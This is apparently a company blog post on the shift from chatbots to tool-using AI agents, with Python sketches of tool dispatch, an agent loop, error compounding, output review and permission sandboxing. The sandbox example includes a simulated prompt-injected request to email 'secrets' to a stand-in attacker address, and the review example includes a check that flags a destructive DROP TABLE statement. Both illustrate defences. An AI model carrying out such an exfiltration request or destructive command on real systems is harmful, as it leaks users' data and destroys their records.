From Chatbots to Agents

The Mafold Team · 6 min read

For about two years, "using AI" meant typing into a box and reading what came back. You asked, it answered. The interface was a conversation, and the unit of work was a single, self-contained reply. That era produced something genuinely useful — and it is quietly ending.

The shift underway isn't mainly about models getting smarter, though they have. It's about what they're allowed to do. A chatbot returns text. An agent takes the text, runs a tool, reads the result, decides what to do next, and keeps going until the task is finished or it gets stuck. That loop — observe, decide, act, repeat — is the whole difference. Everything interesting about the current moment follows from it.

The chatbot was a demo, not a destination

The single-turn assistant was never the goal; it was the first thing that worked. It was easy to build, easy to reason about, and easy to make safe: the model couldn't touch anything, so the worst it could do was be wrong in a sentence. That safety was also its ceiling. A system that can only talk can only ever advise. To draft the email, file the ticket, run the query, fix the test — someone still had to be the hands.

What changed is that models got reliable enough at a new skill: deciding which tool to call, with which arguments, and what to do with the answer. Tool use turned the assistant from a thing you consult into a thing that operates. The conversation is still there, but it's no longer the product — it's the control surface.

The one-line version

A chatbot answers a question. An agent owns an outcome. The model didn't just get better at talking — it got the ability to keep going.

What "agent" actually means now

The word "agent" got stretched to cover everything, so it's worth being concrete. In practice the shift from 2025 to 2026 added three capabilities that compound:

  • Tools. The model can call functions, hit APIs, run code, search the web, and read files. Its output is no longer just words for a human — it's actions with consequences.
  • Memory and context. Longer context windows and external memory let a system carry state across many steps and sessions, so work doesn't reset every turn.
  • Long horizons. The model runs in a loop instead of a single shot. It can attempt, check its own result, recover from a failure, and try a different path — sometimes over dozens of steps without a human in between.
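
To make the "tools" capability concrete, here is a minimal Python sketch of tool dispatch. It assumes the model emits each tool call as a small JSON object with a name and arguments; that wire format, the two toy tools, and the `dispatch` helper are all hypothetical, not any particular vendor's API. The part worth noticing is that failures go back to the model as text, so it can read them and try something else.

```python
import json
from typing import Callable, Dict

# Hypothetical tools: plain functions standing in for real APIs.
def add(a: float, b: float) -> float:
    return a + b

def word_count(text: str) -> int:
    return len(text.split())

TOOLS: Dict[str, Callable] = {"add": add, "word_count": word_count}

def dispatch(tool_call_json: str) -> str:
    """Run one model-requested tool call and return the result as JSON text.

    Errors are returned as text too, so the model can observe them.
    """
    try:
        call = json.loads(tool_call_json)
        tool = TOOLS[call["name"]]
        return json.dumps({"ok": True, "result": tool(**call["arguments"])})
    except Exception as exc:  # bad JSON, unknown tool, wrong arguments
        return json.dumps({"ok": False, "error": f"{type(exc).__name__}: {exc}"})

print(dispatch('{"name": "add", "arguments": {"a": 2, "b": 3}}'))
# {"ok": true, "result": 5}

# An unknown tool comes back as a readable error instead of a crash.
print(dispatch('{"name": "delete_everything", "arguments": {}}'))
```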

Strip the hype and the underlying pattern is mundane and powerful:

done = False
while not done:
    observation = look()        # read state, tool results, errors
    plan = think(observation)   # the model decides the next move
    result = act(plan)          # run a tool, edit a file, call an API
    done = check(result)        # did that work? are we finished?

Every "agent framework" is some version of this loop with guardrails bolted on. Coding agents were the first place it really landed, because software has a free oracle built in: either the code compiles and the tests pass, or they don't. The agent gets honest feedback on every step, which is exactly what a loop needs to not wander off. Wherever a domain has that kind of cheap, trustworthy signal, agents work surprisingly well. Where it doesn't, they struggle, and that distinction now matters more than raw model quality.
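
Here is one way the loop might look as runnable Python, with a single guardrail (a hard step budget) and an oracle that plays the role of a test suite. Everything in it is a stand-in: `run_agent`, the scripted `propose` function that substitutes for a model, and the two candidate "fixes" are assumptions made up for illustration.

```python
from typing import Callable, List, Optional, Tuple

def run_agent(
    propose: Callable[[List[str]], str],
    act: Callable[[str], str],
    check: Callable[[str], bool],
    max_steps: int = 10,
) -> Tuple[Optional[str], List[str]]:
    """Loop until check() passes or the step budget runs out.

    Returns (result_or_None, history). The history is also what the
    agent observes on its next step.
    """
    history: List[str] = []
    for _ in range(max_steps):        # guardrail: hard step budget
        plan = propose(history)       # think: choose the next move
        result = act(plan)            # act: run the tool
        history.append(f"{plan} -> {result}")
        if check(result):             # oracle: did that work?
            return result, history
    return None, history              # stuck: hand back to a human

# Toy stand-ins: the "model" tries candidate fixes in order, the "tool"
# runs the candidate, and the oracle is a one-line test.
candidates = {
    "sort_descending": lambda xs: sorted(xs, reverse=True),
    "sort_ascending": lambda xs: sorted(xs),
}
names = list(candidates)

def propose(history: List[str]) -> str:
    return names[len(history) % len(names)]

def act(plan: str) -> str:
    return repr(candidates[plan]([3, 1, 2]))

def check(result: str) -> bool:
    return result == "[1, 2, 3]"

result, history = run_agent(propose, act, check, max_steps=5)
print(result)        # [1, 2, 3]
print(len(history))  # 2
```

The first attempt fails the test, the failure lands in the history, and the second attempt passes. Swap the oracle for one that never passes and the loop ends at the budget and returns `None` rather than running forever.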

The bottleneck moved

For years the limiting question was "how capable is the model?" That question hasn't gone away, but it's no longer the one that decides whether a project ships. For most everyday tasks, frontier models are already more capable than the products built on top of them know how to exploit. The constraint moved downstream, to reliability, verification, and trust.

Reliability

A model that is right 95% of the time is a great assistant and a dangerous employee. In a single-turn chat, a 5% error rate is a minor annoyance you catch by reading. In a twenty-step agent loop, errors compound: small mistakes early become confident nonsense late, and the system can spend real money or make real changes before anyone notices. Going from "usually right" to "safe to leave alone" is a different and much harder engineering problem than the one that got us here.
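
A rough back-of-the-envelope version of that compounding, under a loud assumption: every step succeeds independently with the same probability. Real agent errors are correlated and sometimes self-corrected, so treat this as intuition, not measurement. The function names are hypothetical.

```python
def chain_success(p_step: float, n_steps: int) -> float:
    """Probability that all n_steps succeed, assuming independent steps."""
    return p_step ** n_steps

def required_step_accuracy(target: float, n_steps: int) -> float:
    """Per-step accuracy needed for the whole chain to reach `target`."""
    return target ** (1.0 / n_steps)

print(round(chain_success(0.95, 1), 3))             # 0.95
print(round(chain_success(0.95, 20), 3))            # 0.358
print(round(required_step_accuracy(0.95, 20), 4))   # 0.9974
```

Under that assumption, a step that is right 95% of the time finishes a twenty-step task cleanly only about 36% of the time, and getting the whole task back to 95% would need each step to be right roughly 99.7% of the time.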

Verification

The deeper issue is that acting is easy to scale and checking is not. It's cheap to have an agent generate a thousand lines of code, a migration plan, or a research summary. It's expensive for a human to confirm all of it is correct. The cost of work is shifting from doing to reviewing, and a lot of the real design effort in 2026 goes into shrinking that review burden — tighter scopes, better traces, automatic tests, second models that critique the first. The teams that win aren't the ones with the smartest model; they're the ones who made its output cheap to trust.
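
One small way to shrink the review burden is to run cheap automated checks first and hand the reviewer a short list of what failed. The sketch below assumes the agent's output is a string; the `Review` type, the `review` helper, and the three example checks are hypothetical and deliberately crude.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List

@dataclass
class Review:
    passed: List[str]
    failed: List[str]

    @property
    def flagged(self) -> bool:
        """True when at least one automated check failed."""
        return bool(self.failed)

def review(output: str, checks: Dict[str, Callable[[str], bool]]) -> Review:
    """Run every check; a check that raises counts as failed."""
    passed: List[str] = []
    failed: List[str] = []
    for name, check in checks.items():
        try:
            ok = check(output)
        except Exception:
            ok = False
        (passed if ok else failed).append(name)
    return Review(passed, failed)

# Example checks for an agent-written SQL migration (illustrative only).
checks = {
    "non_empty": lambda s: bool(s.strip()),
    "no_drop_table": lambda s: "DROP TABLE" not in s.upper(),
    "short_enough": lambda s: len(s.splitlines()) <= 50,
}

migration = "ALTER TABLE users ADD COLUMN age INT;\nDROP TABLE sessions;"
report = review(migration, checks)
print(report.failed)   # ['no_drop_table']
print(report.flagged)  # True
```

Passing checks like these does not make output correct. It only tells the reviewer where to look first.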

Trust

Autonomy and permission are now the same conversation. An agent that can read your files, send messages, and spend money is only as safe as the boundaries around it. "Prompt injection" stopped being a curiosity and became a real security surface the moment models started acting on content they read from the open web. The interesting work here is no longer just "make the model refuse bad requests" — it's "design systems where a compromised or confused agent can't do much damage in the first place."
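
As a sketch of what "can't do much damage in the first place" might look like in code, the wrapper below enforces an allowlist and a call budget outside the model. Whatever the model was talked into requesting, a tool that isn't on the list never runs. The `Sandbox` class, the tool names, and the limits are assumptions for illustration, not a complete security design.

```python
from dataclasses import dataclass
from typing import Callable, Dict, FrozenSet

class PermissionDenied(Exception):
    """Raised when a requested action falls outside the agent's scope."""

@dataclass
class Sandbox:
    tools: Dict[str, Callable[..., object]]
    allowed: FrozenSet[str]   # tool names this agent may use
    max_calls: int = 20       # budget for the whole session
    calls_made: int = 0

    def call(self, name: str, **kwargs: object) -> object:
        # Both checks run here, in ordinary code, not in the prompt.
        if name not in self.allowed:
            raise PermissionDenied(f"tool not allowed: {name}")
        if self.calls_made >= self.max_calls:
            raise PermissionDenied("call budget exhausted")
        self.calls_made += 1
        return self.tools[name](**kwargs)

# Hypothetical tools; the agent is granted read access only.
tools = {
    "read_file": lambda path: f"<contents of {path}>",
    "send_email": lambda to, body: "sent",
}
box = Sandbox(tools, allowed=frozenset({"read_file"}), max_calls=5)

print(box.call("read_file", path="notes.txt"))  # <contents of notes.txt>

try:
    # Imagine injected text convinced the model to request this.
    box.call("send_email", to="attacker@example.com", body="secrets")
except PermissionDenied as exc:
    print(exc)  # tool not allowed: send_email
```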

The human's job changes

When the model becomes the hands, the person becomes something closer to a lead than a typist. The skill that matters is no longer phrasing the perfect prompt; it's specifying outcomes clearly, setting the right boundaries, and reviewing work efficiently. You spend less time producing the first draft and more time deciding whether the draft is right — and being accountable for it either way.

This is genuinely uncomfortable, because reviewing is less satisfying than making, and because it's easy to rubber-stamp work that looks finished. The healthiest teams are treating agents the way they'd treat a fast, eager, slightly unreliable junior: give it real work, keep a tight feedback loop, and never ship what you didn't actually check.

Where this is heading

If single-turn chat was AI as a tool, and the agent loop is AI as a worker, the next step is plainly visible: not one agent, but many — handing work to each other, running alongside the people who own the outcome, each with its own scope and permissions. Once a model can act, the natural question stops being "what can it say to me?" and becomes "how do we all work together?"

That's a harder question than it sounds, and it's mostly not a model problem. It's a coordination problem: who can see what, who's allowed to do what, how work gets handed off, and how a human stays in the loop without becoming the bottleneck. The last two years were about teaching models to act. The next few will be about the systems we build around them once acting is a given — and that's the part worth paying attention to.